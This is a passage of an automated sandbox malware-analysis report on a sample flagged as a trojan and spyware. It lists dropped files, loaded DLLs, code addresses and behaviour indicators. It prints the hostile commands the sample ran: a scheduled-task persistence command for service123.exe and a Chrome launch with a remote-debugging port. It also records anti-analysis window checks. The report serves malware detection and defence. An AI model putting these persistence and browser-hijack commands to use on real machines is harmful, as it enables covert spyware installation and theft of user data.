Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.2809971002.00005E10024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5F9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_6C5F9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5F9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_6C5F9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5F9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 7_2_6C5F9E27

System Summary

barindex
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: PhwUGyok2i.exe Static PE information: section name:
Source: PhwUGyok2i.exe Static PE information: section name: .idata
Source: PhwUGyok2i.exe Static PE information: section name:
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_001651B0 7_2_001651B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00163E20 7_2_00163E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C622CCE 7_2_6C622CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5ECD00 7_2_6C5ECD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5EEE50 7_2_6C5EEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5F0FC0 7_2_6C5F0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C630AC0 7_2_6C630AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5F44F0 7_2_6C5F44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6246E0 7_2_6C6246E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6187C0 7_2_6C6187C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6207D0 7_2_6C6207D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C630060 7_2_6C630060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C622090 7_2_6C622090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C602210 7_2_6C602210
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C612360 7_2_6C612360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C63DC70 7_2_6C63DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6B3D00 7_2_6C6B3D00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6198F0 7_2_6C6198F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5F5880 7_2_6C5F5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C627A20 7_2_6C627A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C62DBEE 7_2_6C62DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C62140E 7_2_6C62140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C631510 7_2_6C631510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C62F610 7_2_6C62F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C60F760 7_2_6C60F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5E3000 7_2_6C5E3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5F70C0 7_2_6C5F70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6A5180 7_2_6C6A5180
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6AADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B3560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B5A70 appears 75 times
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 1148
Source: PhwUGyok2i.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: PhwUGyok2i.exe Static PE information: Section: kdafarva ZLIB complexity 0.9944718095694486
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@25/7@16/5
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5632
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2811550196.00005E10028ED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: PhwUGyok2i.exe Virustotal: Detection: 53%
Source: PhwUGyok2i.exe ReversingLabs: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\PhwUGyok2i.exe "C:\Users\user\Desktop\PhwUGyok2i.exe"
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=1988,i,12239918215258673824,2474268141507560200,262144 /prefetch:8
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 1148
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=1988,i,12239918215258673824,2474268141507560200,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: PhwUGyok2i.exe Static file information: File size 4386304 > 1048576
Source: PhwUGyok2i.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: PhwUGyok2i.exe Static PE information: Raw size of kdafarva is bigger than: 0x100000 < 0x1a7e00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00168230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 7_2_00168230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: PhwUGyok2i.exe Static PE information: real checksum: 0x43a699 should be: 0x432cec
Source: PhwUGyok2i.exe Static PE information: section name:
Source: PhwUGyok2i.exe Static PE information: section name: .idata
Source: PhwUGyok2i.exe Static PE information: section name:
Source: PhwUGyok2i.exe Static PE information: section name: kdafarva
Source: PhwUGyok2i.exe Static PE information: section name: cefydpxz
Source: PhwUGyok2i.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_0016A499 push es; iretd 7_2_0016A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C690C30 push eax; mov dword ptr [esp], edi 7_2_6C690DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C65ED10 push eax; mov dword ptr [esp], ebx 7_2_6C65EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C628E7A push edx; mov dword ptr [esp], ebx 7_2_6C628E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C634E31 push eax; mov dword ptr [esp], ebx 7_2_6C634E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C62A947 push eax; mov dword ptr [esp], ebx 7_2_6C62A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C630AA2 push eax; mov dword ptr [esp], ebx 7_2_6C630AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C648AA0 push eax; mov dword ptr [esp], ebx 7_2_6C64909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C632AAC push edx; mov dword ptr [esp], ebx 7_2_6C632AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C65EAB0 push eax; mov dword ptr [esp], ebx 7_2_6C65EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C662BF0 push eax; mov dword ptr [esp], ebx 7_2_6C662F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C662BF0 push edx; mov dword ptr [esp], ebx 7_2_6C662F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C648460 push eax; mov dword ptr [esp], ebx 7_2_6C648A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C628435 push edx; mov dword ptr [esp], ebx 7_2_6C628449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6204E0 push eax; mov dword ptr [esp], ebx 7_2_6C6206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C62048B push eax; mov dword ptr [esp], ebx 7_2_6C6204A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C601CFA push eax; mov dword ptr [esp], ebx 7_2_6C6B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C601CFA push eax; mov dword ptr [esp], ebx 7_2_6C6B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C62A5A7 push eax; mov dword ptr [esp], ebx 7_2_6C62A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C662620 push eax; mov dword ptr [esp], ebx 7_2_6C662954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C662620 push edx; mov dword ptr [esp], ebx 7_2_6C662973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6266F3 push edx; mov dword ptr [esp], ebx 7_2_6C626707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6206FD push eax; mov dword ptr [esp], ebx 7_2_6C6206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6206A2 push eax; mov dword ptr [esp], ebx 7_2_6C6206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6386A1 push 890005EAh; ret 7_2_6C6386A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6206A6 push eax; mov dword ptr [esp], ebx 7_2_6C6206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6706B0 push eax; mov dword ptr [esp], ebx 7_2_6C670A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C62A777 push eax; mov dword ptr [esp], ebx 7_2_6C62A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C62070E push eax; mov dword ptr [esp], ebx 7_2_6C6206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C630042 push eax; mov dword ptr [esp], ebx 7_2_6C630056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5FE0D0 push eax; mov dword ptr [esp], ebx 7_2_6C6B6AF6
Source: PhwUGyok2i.exe Static PE information: section name: kdafarva entropy: 7.955458272987732
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll Jump to dropped file
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
